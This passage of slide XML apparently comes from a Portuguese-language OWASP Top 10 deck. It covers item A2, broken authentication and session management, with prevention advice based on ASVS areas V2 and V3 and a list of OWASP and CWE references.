              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Senhas, IDs de sessão, e outras credenciais são enviadas através de conexões não criptografadas. Ver A6. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Veja </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>áreas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exigência V2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>V3 do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mais detalhes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="6400800"/>
            <a:ext cx="3382962" cy="27432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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para um conjunto mais completo de requisitos e problemas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evitar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nesta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>área</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consulte as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>áreas de requisitos ASVS para autenticação (V2) e gerenciamento de sessão (V3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Authentication Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Forgot Password Cheat Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Session Management Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId11"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 287 on Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 384 on Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475038" y="3779912"/>
            <a:ext cx="3382962" cy="2544688"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faço para evitar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A recomendação principal para uma organização é disponibilizar aos desenvolvedores:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conjunto único de controles fortes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de autenticação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e gerenciamento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessão. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tais controles devem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>procurar:</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="460800" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cumprir todos os requisitos de autenticação e gerenciamento de sessão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>definidos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Padrão de Verificação de Segurança da Aplicação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do OWASP (ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>áreas V2 (Autenticação) e V3 (Gerenciamento de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sessão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="460800" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ter uma interface simples para os desenvolvedores. Considere o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ESAPI Authenticator e User APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> como bons exemplos para simular, usar ou construir como base.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Grandes esforços também deve ser feitos para evitar falhas de XSS que podem ser utilizados para roubar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>os IDs de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessão. Ver A3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 32"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>A2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76200"/>
            <a:ext cx="5486400" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quebra de Autenticação e Gerenciamento de Sessão</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3110" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3111" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="3115" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
